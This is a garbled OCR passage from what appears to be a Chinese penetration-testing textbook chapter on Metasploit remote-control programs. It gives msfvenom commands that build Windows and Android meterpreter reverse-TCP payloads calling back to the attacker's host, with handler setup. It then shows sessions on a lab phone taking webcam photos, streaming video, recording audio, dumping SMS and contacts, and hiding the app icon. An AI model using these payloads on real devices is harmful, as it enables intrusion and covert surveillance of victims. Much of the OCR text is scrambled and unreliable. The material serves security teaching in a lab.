EasyFileSharing 这 个 服务 喜 程 序 已 经 朋 吝 ， 另 外 渗透 模块 成 功 地 在 目标 
EHLERS Y t RASET o 





Easy File Sharing Web Server 


2g Easy File Sharing Web Server 已 停止 工作 
Windows 可 以 联机 检查 该 问题 的 解决 方案 。 





> 联机 检查 解决 方案 并 关闭 该 程序 


? 关闭 程序 


v) 童 震 问题 详细 信息 

















图 6-3 ”被 渗透 的 目标 主机 


iX Python t3 MR 2635, WA ds SE H bv E RD L E SE BUR f 
DRERI, JA ia OEIL E cdi E TREATS n! B Shelleodeiitt 7 BI 
可 。 那 么 接 下 来 融 来 介绍 一 下 如 何 获得 指定 作用 的 代码 。 


6.2 ”远程 控制 程序 基础 


及 现 了 目标 的 漏洞 之 后 ， 我 们 残 可 以 去 查找 对 应 的 漏洞 渗透 模块 。 
但 是 正如 本 和 章 第 1 节 上 所 演示 的 那样 ， 单 单 是 别人 编写 好 的 漏洞 渗透 模块 
并 不 能 实现 我 们 预计 的 功能 。 例 如 上 例 中 我 们 利用 该 漏洞 渗透 模块 
39009.py 实 现 了 对 目标 的 渗透 ， 成 功 地 和 骨 沉 了 目标 系统 上 运行 的 
EasyFileSharing， 并 局 动 了 计 宽 右 程 序 ， 但 是 如 果 我 们 需要 在 目标 上 执 
行 其 他 功能 呢 ? 


之 前 我 们 曾经 将 漏洞 渗透 模块 比喻 成 一 个 进入 目标 系统 的 钥 媳 ， 现 
在 我 们 已 经 获得 了 这 把 珍贵 的 钥匙 ， 接 下 来 我 们 可 以 将 一 段 代 人 码 ( 也 束 
是 之 前 提 到 的 Shellcode) 送 到 目标 系统 并 执行 。 如 果 可 以 选择 的 话 ， 你 
会 硕 望 这 段 代 码 实现 哪个 功能 ? 


D 让 目标 系统 上 的 服务 衣 溃 。 

2) 在 目标 系统 上 执行 某 个 程序 。 

3) 直接 控制 目标 系统 。 

是 不 是 第 3 个 选择 是 最 激动 人 心 的 呢 ? 那么 我 们 希望 在 目标 系统 上 
运行 的 代码 就 应 该 是 一 个 远程 控制 程序 。 远 程控 制程 序 是 一 个 很 常见 的 
计算 机 用 语 ， 指 的 就 是 可 以 在 一 台 设备 上 操纵 另 一 台 设 备 的 软件 。 

通常 情况 下 ， 远 程控 制程 序 一 般 分 成 两 个 部 分 ， 即 被 控 端 和 主 控 
端 。 如 果 一 台 计算 机 上 执行 了 这 个 被 控 端 的 话 ， 那 么 就 会 被 另外 一 台 装 
有 主 控 端 的 计算 机 所 控制 了 。 曾 经 在 整个 中 华 大 地 掀起 了 胡 胡 烈 烈 的 全 


民品 和 铭 运 动 的 “灰色 子 ” 束 古 这 杆 的 一 个 远程 控制 软件 ， 据 统计 早 在 2005 
年 的 时 候 ,，“ 灰 鸟 子 ” 束 已 经 感染 了 近 百 万 台 计 算 机 。 


现在 世界 上 航 广 泛 使 用 的 远程 控制 软件 有 很 多 种 ， 其 中 既 有 一 些 确 
实 是 为 人 们 提供 工作 便利 的 正和 党 软件 ， 例 如 TeamViewer， 也 有 一 些 是 
专门 为 黑客 入 侵 所 打造 的 后 门 木 扎 。 


在 这 里 我 们 并 不 去 考虑 这 些 软件 的 目的 是 善意 还 
术 的 角度 对 其 进行 分 类。 实际 上 远程 控制 软件 的 分 
我 们 只 介 绍 两 个 最 为 常用 的 标准 ， 


第 一 个 标准 束 是 远程 控制 软件 被 控 凯 与 主 控 凯 的 连接 方式 。 按 照 不 
同 的 连接 方式 ， 我 们 可 以 将 远程 控制 软件 分 为 正 癌 和 反问 两 种 。 


这 里 我 们 假设 这 样 一 个 场景 ， 一 个 黑客 设法 在 受害 者 的 计算 机 上 执 
行 了 远程 控制 软件 服务 病 ， 那 么 我 们 把 黑客 现在 所 使 用 的 计算 机 称 为 
Hacker， 而 把 受害 者 所 使 用 的 计算 机 称 为 A。 如 来 说 黑客 所 使 用 的 远程 
控制 软件 是 正 同 的 ， 那 么 计算 机 A 在 执行 了 这 个 远程 控制 服务 病 之 后 ， 
只 会 在 自己 的 主机 上 打开 一 个 端口 ， 然 后 等 待 Hacker 计 算 机 的 连接 ， 注 
意 此 时 A 计 算 机 并 不 会 去 主动 通知 Hacker 计 算 机 而 反 回 控制 软件 
会 ) ， 因 此 黑客 必须 知道 计算 机 A 的 IP 地 址 。 这 导致 了 正 癌 控制 在 实际 
操作 中 具有 很 大 的 困难 。 


而 反问 远程 控制 则 截然 不 同 ， 当 计算 机 A 在 执行 了 这 个 远程 控制 被 
控 问 之 后 ， 会 主动 去 通知 Hacker 计 算 机 ,“ 嗨 ， 我 现在 受 你 的 控制 了 ， 
请 下 命令 吧 ”， 因 此 黑客 也 无 需 知道 计算 机 A 的 IP 地 址 ， 只 需要 把 这 个 
Dmm 现在 黑客 所 使 用 i de 
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个 束 很 容易 理解 了 ， 我 们 平时 在 Windows 上 运行 的 软件 大 都 是 exe 文 
件 ， 而 Android 操 作 系统 上 则 大 都 是 apk 文 件 。 显然 你 制造 的 一 个 
的 远程 控制 被 控 六 对 于 手机 使 用 的 Android 操 作 系 统 
全 无 作用 的 。 目 前 常见 的 操作 系统 主要 有 微软 的 Windows、 人 谷歌 的 
Android. 平 果 的 i0S 以 及 各 种 的 Linux 系 统 。 


为 外 随 看 互联 网 的 人 不断 友 展 ， 针 对 各 种 网 站 开 友 技术 的 远程 控制 软 
件 也 出 现 了 ， 这 些 远 程控 制 软件 也 都 及 用 和 网 站 开 友 相同 的 语言 ， 例 如 
asp、php 等 。 


63 ”如 何在 Kali Linux 2 中 生成 被 控 端 


上 一 厄 中 我 们 讲 到 了 远程 控制 软件 中 的 被 控 疾 和 主 控 剖 必须 是 成 对 
使 用 的 ， 和 被 控 闯 惑 是 要 运行 在 目标 计算 机 上 的 ， 这 个 程序 的 功能 听 起 来 
和 木马 很 像 ， 实 际 上 也 是 如 此 。 万 外 实际 上 我 们 要 在 渗透 漏 调 代 码 中 车 
换 的 Shellcode 部 分 融和 是 这 个 远程 控制 程序 的 被 控 病 的 代码 。 现 在 我 们 多 
来 学 习 一 下 如 何 生 成 被 控 并 (这 个 被 控 并 既 可 以 是 一 段 代码 ， 也 可 以 是 
一 个 且 接 执行 的 程序 〉。 


在 Kali Linux 2 中 提供 了 多 个 可 以 用 来 产生 远程 控制 被 控 闪 程序 的 方 
式 ， 但 是 其 中 最 为 简单 强大 的 方法 应 该 要 数 Msfvenom 命 令 了 。 这 个 命 
令 是 著名 渗透 测试 软件 Metasploit 的 一 个 蕊 能 ， 但 是 我 们 可 以 直接 在 Kali 
Linux 2 中 使 用 这 个 命令 。 


以 前 旧版 本 的 Metasploit 中 提供 了 两 条 关于 远程 控制 被 控 闹 程序 的 
但 令 ， 其 中 msfpayload 人 负 贡 用 来 生成 攻击 载 傈 ，msfencode 负 贡 对 攻击 载 
进行 编码 。 新 版 本 的 Metasploit 中 将 这 两 条 命令 整合 成 为 了 msfvenom 
^, 下面 给 出 了 msfvenom 的 几 个 常见 的 使 用 参数 。 


Sp 3i Ep 


"E 


Options: 

-p, --payload <payload> 指 定 要 生成 的 payload( 攻 击 荷载 )。 如 果 需 要 使 用 自 定 
义 的 payload， 请 使 用 ' - "或 者 stdin 指 定 

-f, --format <format> 指 定 输出 格式 (可 以 使 用 --help-formats 来 获取 msf 


文 持 的 输出 格式 列表 ) 

-0, --out <path> 指 定 存储 payload 的 位 置 
--payload-options 列举 paylo0ad 的 标准 选项 
--help-formats 查看 msf 文 持 的 输出 格式 列表 





这 里 面 的 参数 很 多 ， 但 是 实际 使 用 起 来 很 筒 单 ， 例 如 我 们 如 朱 只 起 
硕 望 生成 一 个 简单 的 被 控 凯 程序 ， 那 么 只 需要 使 用 参数 -p、-f 和 -o 即 


可 ， 分 别 指定 要 使 用 HIE mE COH n] LEH Metasploit} Pj EJ 
被 控 闪 程序 ， 我 们 会 在 后 面 中 对 此 进行 详细 的 介绍 ) 、 要 应 用 的 平台 
(这 里 我 们 以 windows 为 例 ) 、 保 存 的 位 置 。 


root@kali:~# msfvenom -p windows/meterpreter/reverse tcp lhost-192.168.1069 


.130 lportz5000 -f exe -o /root/payload.exe 





执行 的 结果 如 图 6-4 所 示 。 


:~# msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.169.130 l 
port=5000 -f exe -o /root/payload.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 
ad 

No Arch selected, selecting Arch: x86 from the payload 





No encoder or badchars specified, outputting raw payload 
Payload size: 333 bytes 


Final size of exe file: 73802 bytes 
Saved as: /root/payload.exe 


图 6-4 ”生成 攻击 载 往 的 过 程 


这 里 面 我 们 使 用 最 简单 的 msfvenom 命 令 来 生成 一 个 被 控 端 程序 ， 
使 用 的 被 控 端 程序 就 是 一 个 用 于 Windows 平 台 下 的 反问 远程 控制 程序 : 
windows/meterpreter/reverse tcp, "72 XXlhostlh] 48 7J 
192.168.169.130“ 这 个 地 址 也 就 是 我 们 所 使 用 的 Kali Linux 2 虚拟 机 的 IP 
MURAL) ， 生 成 的 文件 如 图 6-5 所 示 。 


< >» 4 fi Home Public >» 


© Recent Zh NJ 
Desktop Documents Downloads 
A 


am Desktop nin 


[À Documents Public Templa 





由 Downloads 
JI Music 

*£] Pictures 
H Videos 

m Trash 

[gj] Floppy Disk 


+ Other Locations 


图 6-5 ÆI E EE OCT 


6.4 如 何在 Kali Linux2 中 启动 主 控 端 


如 果 我 们 让 这 个 文件 在 某 一 台 计 算 机 上 执行 的 话 ， PE ÉL 
aL zs Sr 20] [8036 $/192.168.169.130 E, fH XE ALD XR — P ES 
所 以 我 们 需要 局 动 一 个 远程 控制 文件 的 主 控 新 。 这 个 主 控 端 需要 在 
Metasploit 中 局 动 CS T MetasploitR a 下 一 草 中 详细 介 
7H) ， 首 先 打 开 一 个 终 闫 然后 输入 msfconsole 局 动 Metasploit。 


root@kali:~# msfconsole 


局 动 之 后 的 Metasploit 界 面 如 图 6-6 所 示 。 


root@kali: ~ ooo 
File Edit View Search Terminal Help 


: E E I3HHHHHHE a ] 
SHEHHHEHHHBE # 
LLLI EE DELETE IE IIII Were HHEETHHEIESHHEHHIHHEEIHHIEHEHIHHERHEHHHEHIHHIRE EHE 


AEHERHETHHHEHHHEEHEHIHEBHEHHHBEHIHHHBHHHHHEBHHHHBHHHHHHHHBHHHHHHHHHHHHHHHHHBHHHHEHHHHBRHHIHREER 
http://metasploit.com 


Ti d Ec p^ 'set RHOSTS' € ck & pwn with Metasploit Pro 
Le ://rapid7.com/metasploit 


z[ ] 
--z[ 1639 exploi - 944 auxiliary - 289 post ] 
us 472 pa De i - 40 encoders - 9 : ] 
--=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 





msf > | 


Kl6-6 ”局 动 之 后 的 Metasploit 


在 Metasploit 中 使 用 handler 来 作为 主 控 问 ， 这 个 handlerfiy 于 exploit 下 
的 multi 目 录 中 ， 局 动 handler 的 命令 如 下 : 


msf» use exploit/multi/handler 


7 a Epayload CE RSKI B SC) C? REP) 为 
windows/meterpreter/revese tcp, ix &lhost7j 
192.168.169.130 (192.168.169.130 为 我 们 之 前 所 设置 的 lhost) ，]port 为 
5000， 如 图 6-7 所 示 ， 然 后 exploit 等 待 对方 上 线 。 


msf > use exploit/multi/handler 
msf exploit( ) > set payload windows/meterpreter/reverse tcp 
yload => windows "pr gs 1 


reter/reverse tcp 
et lhost 192.168.169.130 





Started reverse TCP handler on 192.168.169.130:5000 
Starting the payload handler... 


图 6-7 ”在 Metasploit 中 局 动 handler 
这 样 我 们 束 局 动 了 一 个 专门 为 刚才 的 被 控 问 程序 所 设置 的 处 理 程 


序 ， 这 个 处 理 程序 只 会 监听 来 自 感染 了 被 控 端 程序 的 通信 。 我 们 在 目标 
计算 机 上 可 以 双击 启动 这 个 被 控 端 程序 ， 如 图 6-8 所 示 。 


iavInad. exe 





Kle-8 ”在 Windows XP} X titia SC EH 


然后 我 们 返回 到 Kali Linux 2 中 就 会 看 到 在 Metasploit 中 打开 了 一 个 
session， 这 表示 从 现在 开始 起 我 们 束 可 以 通过 被 控 问 程序 来 控制 目标 计 
算 机 了 ， 如 图 6-9 所 示 。 


| TCP handler on 192.168.169.130:5000 
he payload handler... 
age (957487 bytes) to 192.168.169.132 


Mete l opened (192.168.169.130:5000 -> 192.168.169.132:1128) 


eterpreter session 1 o 
at 2017-10-26 22:25:40 -0400 





meterpreter » 


Kl6-9 成功 获取 Meterpreter 


这 时 可 以 看 到 在 session 打 开 之 后 ， 下 面 出 现 了 一 个 Meterpreter， 它 
其 实 束 是 一 个 个 控 羡 程序 。Meterpreter 十 运行 在 内 存 中 的 ， 通 过 注入 dl 
文件 实现 ， 在 目标 计算 机 的 便 航 上 不 会 留 下 文件 痕迹 ， 所 以 在 被 入 侵 时 
很 难 找到 。 


Hil TE] 3/4] 14555 H] msfvenom ^E Ji, f — 1 xecie] HJ dict ?m ey. "tede 
T Metasploit P 44 HJ windows/meterpreter/reverse tcp^E EX HJ. Metasploit 
中 的 Payload《〈 可 以 直接 在 目标 计算 机 上 直接 执行 的 代码 ) 分 类 下 提供 
了 大 量 的 被 控 冰 程序， 本 书 中 后 面 的 Payload 也 可 以 等 同 于 航 控 冲程 
序 ， 我 们 可 以 使 用 如 下 命令 来 得 看 所 有 可 以 使 用 的 Payload。 


root@kali:~#msfvenom - payloads 


这 个 命令 执行 的 结果 列 出 了 当前 系统 的 一 共 486 个 Payload， 如 图 6- 
10 所 示 。 


:~# msfvenom -l payloads 


ramework Payloads (486 total) 





图 6-10” 列 出 Metasploit 中 的 全 部 Payload 


ix Fi B5 063 VALE), 26— J| ;ePayloadl] AA Ko — 98 — Fl ze 
Payload 的 摘 述 。 所 有 的 Payload 模 块 的 名 字 都 采用 三 段 式 的 标准 ， 残 是 
采用 针对 的 操作 系统 + 控制 方式 + 蛋 块 具体 名 称 共 同 组 合 而 成 。 例 如 上 例 
中 Hwindows/meterpreter/reverse_tcp 模 块 的 命名 模式 就 如 表 6-1 所 示 。 


表 6-1 模块 命名 模式 





针对 的 操作 系统 Ti rl 73 IN 模块 的 名 称 


/meterpreter /reverse tcp 


这 里 面 的 486 个 Payload 按 照 操 作 系 统 进行 了 分 类 ， 这 些 操 作 系 统 包 
括 我 们 最 为 常见 的 Windows、Linux、Android、Osx 等 ， 以 前 Windows 方 
面 的 Payload 的 使 用 率 是 最 高 的 ， 而 随 看 现在 移动 设备 的 普及 ， Android 
方面 Payload 模 块 已 经 后 来 夺 上 了 。 


而 这 些 payload 提 供 的 控制 方式 也 并 不 相同 ， 主 要 有 shell 和 和 
Meterpreter 等 几 种 ， 其 中 的 Meterpreter 是 Metasploit 中 最 为 优秀 的 一 种 控 
制 方 式 ， 本 书 中 的 所 有 实例 都 采用 了 这 种 控制 方式 。 


最 后 面 模块 的 名 称 中 ， 一 般 会 标识 出 该 payload 采 用 的 是 正 同 还 是 反 
问 的 方式 ， 以 及 采用 了 哪 一 种 网 络 协议 进行 传输 ， 例 如 本 例 中 的 
reverse tcpz&zs JL AE HI J TCP PENATI EFE f e 


例如 我 们 这 次 渗透 训 试 的 目标 是 一 个 Windows 操 作 系 统 ， 那 么 在 选 
择 Payload 的 时 候 ， 束 要 首先 去 考虑 那些 在 Windows 分 类 下 的 Payload。 

每 个 payload 在 使 用 的 时 候 都 需要 设 定 一 些 参 数 ， 例 如 本 例 中 使 用 的 
reverse_tcp 是 一 个 反 同 木马 ， 它 在 运行 之 后 会 去 主动 连接 控制 只 ， 我 们 
必须 要 给 出 控制 闫 的 耳 地 址 和 闪 口 。 


如 果 你 现在 并 不 了 解 菜 个 Payload 使 用 方法 的 话 ， 可 以 使 用 选项 -- 
payload-options 来 查看 这 个 payload 需 要 设置 的 参数 : 


root# msfvenom -p windows/meterpreter/reverse tcp --payload-options 


AITZE, RAH Uer ox Payload VEA fE i. f, n Ed6-119T 
不 。 


msfvenom -p windows/meterpreter/reverse tcp --payLoad-options 
Options n pay Lond/windows/Beterpreter ra tcp: 


Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager 
Module: payload/windows/meterpreter/reverse tcp 
Platform: Windows 
Arch: x86 
in: No 


Rank: Normal 


Provided by: 
skape <mmiller@hick.org> 
sf <stephen fewer@harmonysecurity.com> 
0] Reeves 
hdm <x@hdm. io> 


Basic options 
Name Current Setting Required Description 


EXITFUNC process Exit technique esta dou '', Seh, thread, process, none) 
LHOST The Listen addre 
LPORT 4444 The Listen port 


Description: 
Inject the meterpreter server DLL via the Reflective DLL Injection 
payload (staged). Connect back to the attacker 


图 6-11 ”当前 Payload 的 参数 


其 中 方 框 圈 起 来 的 部 分 吏 是 我 们 需 d 这 个 参数 信息 是 
以 一 个 表格 的 形式 给 出 ， 一 共 分 成 4 列 ， 一 多 为 参数 的 名 称 ， 第 二 列 
为 参数 的 默认 值 ， 第 三 列 为 参数 值 是 OS 5 第 四 列 为 对 这 个 参数 的 


介绍 。 





当前 这 个 Payload 有 EXITFUNC、LHOST、LPORT 3 个 参数 ， 其 中 
nb LHOST 古 控制 疡 的 JP 地 址 ， 通常 就 是 你 现 
在 使 用 的 那 台 计算 机 的 IP 地 址 ，LPORT 是 控制 端的 端口 ， 这 个 值 可 以 是 
E AK US 的 端口 ， 默 认 值 是 4444， 保 持 默 认 值 即 可 。 


这 些 生 成 的 Payload 履 是 一 些 代 三 ， 这 些 代 但 可 以 编 详 成 可 以 直接 


执行 的 格式 ， 例 如 在 Windows 下 可 执行 的 exe 文 件 。Metasploit 中 提供 了 
很 多 种 格式 ， 我 们 可 以 使 用 --help-formats 来 查看 所 有 支持 的 格式 : 


该 命令 执行 的 结果 如 图 6-12 所 示 : 


:~# msfvenom --help-formats 
Executable formats 
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe 
, exe-only, exe-service, exe-small, hta-psh, jar, jsp, lo 
op-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh 


-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war 
Transform formats 

bash, c, csharp, dw, dword, hex, java, js be, js_ 
le, num, perl, pl, powershell, psl, py, python, raw, rb, 
ruby, sh, vbapplication, vbscript 


图 6-12 ”msfvenom 支 持 有 的 payload 输 出 格式 





这 里 面 束 包含 了 我 们 在 Windows 操 作 系 统 下 最 为 弟 见 的 exe 和 dll 格 
式 。 我 们 将 生成 的 文件 保存 到 指定 的 位 置 ， 可 以 使 用 -o 参 数 。 


现在 我 们 再 来 查看 开始 时 使 用 Msfvenom 生 成 Payload 的 那 条 命令 : 


root@kali:~# msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.169 


.130 lportz5000 -f exe -o /root/payload.exe 





pUEEXEAXELUHISA f. Vim A A SUC AS Xu: 


Options: 

-p, --payload <payload> 指 定 要 生成 的 payload( 攻 击 何 载 )。 
=l; ==-list [type] 列 出 一 个 模块 类 型 ， 模 块 类 型 包括 : payloads, encoders, nops, 
all 

-n, --nopsled <length> 为 payload 牛 成 数量 为 n 的 NOP 指 令 

-f, --format <format> 指 定 输出 格式 (可 以 使 用 --help-formats 来 获取 msf 文 持 
的 输出 格式 列表 ) 

-e, --encoder [encoder] 指定 需要 使 用 的 编码 器 

-a, --arch <architecture> 指 定 payload 的 目标 架构 

--platform <platform> 指 定 payload 的 目标 平台 

-S, --space «length» xe & USC RECTE] E CE 

-b, --bad-chars <List> 设 定 坏 字 符 集 ， 比 如 : 'NxeeWxft' 

-i, --iterations <count> 指 定 对 payload 的 编码 次 数 

-C, --add-code <path> 指 定 一 个 附加 的 win32 shellcode 文 件 

-X, --template <path> 指 定 一 个 目 定 义 的 可 执行 文件 作为 模板 

-k, --keep 保护 模板 程序 的 动作 ， 注 入 的 payload 作 为 一 个 新 的 进程 运行 
--payload-options 列举 payload 的 标准 选项 

-0，--out <path> 指 定 存储 payload 的 位 置 

-V, --var-name <name> 指 定 一 个 目 定 义 的 变量 ， 以 确定 输出 格式 
--smallest 生成 最 小 的 payload 

-h，--help 查看 帮助 选项 

--help-formats 查看 msf 文 持 的 输出 格式 列表 








6.5.1 ”在 Android 操 作 系 统 下 使 用 Meterpreter 


之 前 我 们 使 用 Msfvenom 命 令 生 成 了 一 个 可 以 在 Windows 下 执行 的 
Meterpreter。Meterpreter 的 功能 极为 强大 ， 所 以 接 下 来 我 们 要 详细 地 来 
介绍 Meterpreter 的 使 用 方法 。 鉴 于 现在 Android 操 作 系 统 越 来 越 普及 ， 使 
用 程度 已 经 超越 了 Windows 操 作 系 统 ， 所 以 我 们 先 从 Android 操 作 系 统 开 


H o 


对 Android 操 作 系 统 进 行 远 程控 制 的 方法 和 我 们 之 前 介绍 的 一 样 ， 


tss RAERE A ER mM dm. X MC m RA 1326 328 186 H 
Payload〈 融 是 一 段 可 以 在 目标 计算 机 上 执行 的 代码 ) ， 不 同 的 Payload 
执行 之 后 为 我 们 提供 的 控制 权限 并 不 相同 ， 其 中 一 部 分 束 可 以 提供 
MEeterpreter 的 控制 权限 。 我 们 移 来 得 看 一 下 如 何 生成 一 个 可 以 在 Android 
中 执行 的 Payload。 


生成 一 个 被 控 病 必须 要 考虑 的 只 有 4 点 : 选用 哪个 Payload， 设 置 
Payload 的 参数 ， 和 输出 Payload 格 式 ， 输 出 Payload 的 位 置 。 


首先 查找 一 下 Metasploit 中 可 以 在 Android 下 运行 的 Meterpreter: 


root@kali:~# msfvenom -l payloads 


执行 命令 之 后 ， 可 以 看 到 所 有 可 以 运行 的 Payload， 如 图 6-13 所 示 。 


Framework Payloads (486 total) 


aix/ppc/shell bind tcp 
aix/ppc/shell find port 
aix/ppc/shell interact 
aix/ppc/shell reverse tcp 
android/meterpreter/reverse http 
android/meterpreter/reverse https 
android/meterpreter/reverse tcp 


android/meterpreter reverse http 
android/meterpreter reverse https 


android/meterpreter reverse tcp 
android/shell/reverse http 
android/shell/reverse https 
android/shell/reverse tcp 
bsd/sparc/shell bind tcp 





图 6-13 ”可 以 在 Android 平 人 台 下 运行 的 payload 


里 面 一 共有 9 个 可 以 运行 在 Android 操 作 系 Ju 的 IFEI 而 程序 ; A L 
中 前 的 6 个 是 采用 Meterpreter 进 行 控 制 ， 后 面 的 3 个 是 采用 普通 的 命令 
行 Shell 进 行 控制 。 我 们 现在 Dlandroid/m.ter erter/reverse _tcp 为 例 作 为 实 


例 来 演示 使 用 方法 。 


root# msfvenom -p windows/meterpreter/reverse tcp --payload-options 


TA L Ja n] NE Sao P ABC rf 288] 22 290 FS6- 14 HZ 


Options for payload/android/meterpreter/reverse tcp: 


Name: Android Meterpreter，Android Reverse TCP Stager 
Module: payload/android/meterpreter/reverse tcp 
Platform: Android 
: dalvik 
in: No 
size: 8770 
Rank: Normal 


Provided by: 


egypt <egypt@metasploit.com> 
0J Reeves 


Basic options: 
Name Current Setting Required Description 


LHOST The listen address 
LPORT 4444 The listen port 





Description: 
Run a meterpreter server in Android. Connect back stager 


图 6-14 ”显示 Payload 的 参数 


必要 的 参数 只 有 一 个 下 地 址 ， 也 就 是 当 这 个 被 控 端 运行 之 后 ， 要 去 
联系 的 主 控 端的 IP 地 址 。 这 次 我 们 就 使 用 Kali Linux 2 计算 机 IP 作 为 这 个 
参数 的 值 。 端 口 使 用 的 是 9999。 这 里 我 是 在 VMware 虚拟 机 中 使 用 Kali 
Linux 2， 联 网 模式 要 修改 为 桥接 。 测 试用 的 手机 与 我 的 计算 机 连接 在 同 
一 无 线 局 域 网 环境 中 ， 了 地址 由 无 线路 由 器 分 配 。 


目前 实验 用 的 网 络 环境 如 下 。 


e 测试 用 Android 系 统 的 手机 :， 192.168.1.102 
e 虚拟 机 Kali Linux 2: 192.168.1.103 
e 无 线路 由 器 : 192.168.1.1 


天 于 输出 的 格式 ， 这 里 有 一 点 问题 ， 在 msfvenom 命 令 中 默认 并 没 
有 apk 这 种 可 以 直接 在 Android 操 作 系 统 执行 的 文件 格式 ， 但 是 前 面 的 
android/meterperter/reverse_tcp 却 表明 这 是 一 个 可 以 在 Android 下 运行 的 
payload， 我 们 可 以 采用 之 前 的 一 个 你 持 文件 原始 格式 的 参数 “R>”( 这 
个 参数 也 没有 在 msfvenom 的 帮助 中 出 现 ) ， 使 用 这 个 参数 束 无 需 再 使 
用 -f 指 定 和 输出 格式 ， 也 无 需 使 用 -o 来 指定 输出 位 置 。 


最 后 确定 要 输出 在 Android 平 台 下 被 控 端 的 命令 如 下 : 





root@kali:~# msfvenom -p android/meterpreter/reverse tcp lhost=192.168.1. 


| 10 lportz9999 R»/root/pentest.apk | 


这 条 命令 执行 之 后 ， 束 会 在 ROOT 目录 下 生成 一 个 名 为 pentest.apk 
的 文件 ， 如 图 6-15 所 示 。 


< 3 4 ù Home | Desktop 上 


Cr) Recent 


fii Home pentest.apk 
[ð Documents 


© Downloads 


图 6-15 ”生成 的 pentest.apk 文 件 
然后 我 们 建立 一 个 主 控 端 


首先 司 动 Metasploit， 打开 一 个 命令 行 执行 msfconsole， 即 : 


root@kali:~# msfconsole 


然后 在 打开 的 Metasploit 中 执行 以 下 命令 ， 这 里 面 的 主 控 闹 其实 是 
一 个 Handler， 这 个 Handler 中 需要 3 个 参数 ， 一 个 参数 是 所 使用 的 
Payload， 一 个 参数 是 该 Payload 所 使 用 的 卫 地 址 ， 最 后 一 个 参数 是 该 
Payload 所 使 用 的 新 口 ， 这 3 个 参数 都 需要 和 被 控 六 设置 的 一 样 才 行 


msf» use exploit/multi/handler 

msf exploit(handler) » set payload android/meterpreter/reverse tcp 
payload => android/meterpreter/reverse tcp 

msf exploit(handler) » set lhost 192.168.1.103 

lhost -» 192.168.1.103 


msf exploit(handler) » set lport 9999 

lport => 9999 

msf exploit(handler) » exploit 

[*] Started reverse TCP handler on 192.168.1.103:5000 
[*] Starting the payload handler... 





FERIHA pentest.apko- f FAX B SU-F- purae, ease te m 
面 如 图 6-16 所 示 。 


MainActivity 





资费 相关 | 3 v 
隐私 相关 7 
多 媒体 相关 | 2 


Klo-16 Zł mt lljpentest.apk7r rf 


然后 我 们 单 击 “ 打 开 ? 执 行 这 个 文件 ， 然 后 返回 到 Kali Linux 2 系统 ， 
这 时 束 可 以 发 现 手机 上 打开 了 一 个 Meterpreter 连 接 ， 如 图 6-17 所 示 。 


)2 


oad handler... 
676 oytes) to 192.168.1.10 


8.1.102 
opened (192.168.1.103:9999 -> 192.168.1.102:52432) at 





图 6-17 打开 的 meterpreter 控 制 


我 们 执行 “help” 命 令 ， 奏 看 通过 Meterpreter 可 以 执行 的 命令 。 


meterpreter» help 


这 里 面 会 列举 出 所 有 可 以 使 用 的 命令 ， 我 们 先 来 在 看 在 Android 中 
适用 的 功能 ， 如 图 6-18 所 示 。 


Command Description 


record mic Record audio from the default microphone for X seconds 


webcam list List webcams 
webcam snap Take a snaps 


Command Description 


activity start Start an Android activity from a Uri string 


Ü et contacts lis 
dump sms Get sms messages 


hide app icon Hide the app icon from the launcher 





send sms 


sqlite query 





Enabte/Disabte Woketock a otermtion 
图 6-18 在 Android 系 统 下 可 以 运行 的 功能 


这 里 面 Android 系 统 较 为 适用 的 功能 主要 有 了 两 关 ， 一 类 是 Webcam， 
另 一 类 是 Android。Webcam 关 命令 主要 是 与 摄像 头 和 录音 有 关 的 命令 。 


例如 我 们 使 用 Webcam_list 命 令 来 列 出 当前 主机 上 的 所 有 摄像 头 。 


meterpreter»Webcam list 


执行 这 条 命令 的 结束 如 图 6-19 所 示 。 





图 6-19 列 出 目标 可 以 使 用 的 摄像 头 


我 们 可 以 利用 摄像 头 进行 录制 视频 和 担 摄 照 请 ， 首 先 使 用 后 症 摄 休 
k C731) KARKEA., MTIMA N: 


meterpreter>Webcam_snap 1 


执行 的 效果 如 图 6-20 所 示 。 


eterpreter > webcam snap 1 


Tar ur RR 
Got frame 
Stopped 
ebcam shot saved to: /root/ikKIv0oZ. jpeg 


图 6-20 ”控制 目标 摄像 头 进行 担 照 





拍摄 的 照片 以 kKIvOoZ.jpeg 为 名 你 存在 了 root 目 录 下 ， 打 开 可 以 看 
到 如 图 6-21 所 示 的 照片 。 





图 6-21 控制 目标 担 摄 的 照 万 


接 下 来 ， 我 们 来 得 看 录制 视频 功能 ， 执 行 的 命令 为 : 


这 个 命令 执行 后 束 会 启动 后 置 摄像 涉 ， 如 图 6-22 所 示 。 


meterpreter > webcam stream 1 
St 


arting as 
Preparing player... 
Opening player at: oEpaHubp.html 
Streaming... 





图 6-22 ”控制 目标 摄像 头 进行 摄像 


连接 建立 成 功 之 后 ， 在 我 们 的 Kali Linux 2 会 自动 启动 一 个 浏览 器 ， 
担 摄 的 视频 会 在 浏览 磺 中 显示 ， 如 图 6-23 所 示 。 


Places v — Firefox ESR v Sat 22:14 





Metasploit webcam. stream - 192.168.1.102 - Mozilla Firefox o o o0 
Metasploit web... x Metasploit web... x | Metasploit web... x | Metasploit web... x / Metasploit web... x \ 中 
file:///root/oEpaHubp.html i * B + û = 
Eg Most Visited v [llOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools KlExploit-DB Aircrack-ng 
Target IP : 192.168.1.102 


Start time : 2017-08-19 22:13:50 -0400 
Status : Playing 





www.metasploit.com 


图 6-23 ÆA T2811 JF TH DOCUIT TUS 


record_mic 命 令 和 Webcam_snap 命 令 的 使 用 方法 一 样 ， 会 局 动 目标 
手机 上 的 录 首 机 ， 然 后 将 录 首 文件 你 存 起 来 。 


下 面 我 们 来 看 看 Android 分 类 下 可 用 的 命令 。 首 先 我 们 可 以 查看 日 
标 手 机 是 否 已 经 执行 过 root 操 作 : 


执行 命令 以 及 命令 的 结果 如 图 6-24 所 示 。 


meterpreter > check root 





Device is not rooted 


图 6-24 RAHMEN R OAI froot ik 


一 般 我 们 获取 了 目标 手机 的 控制 权 ， 痢 会 对 哪些 内 容 感 兴趣 呢 ? 无 
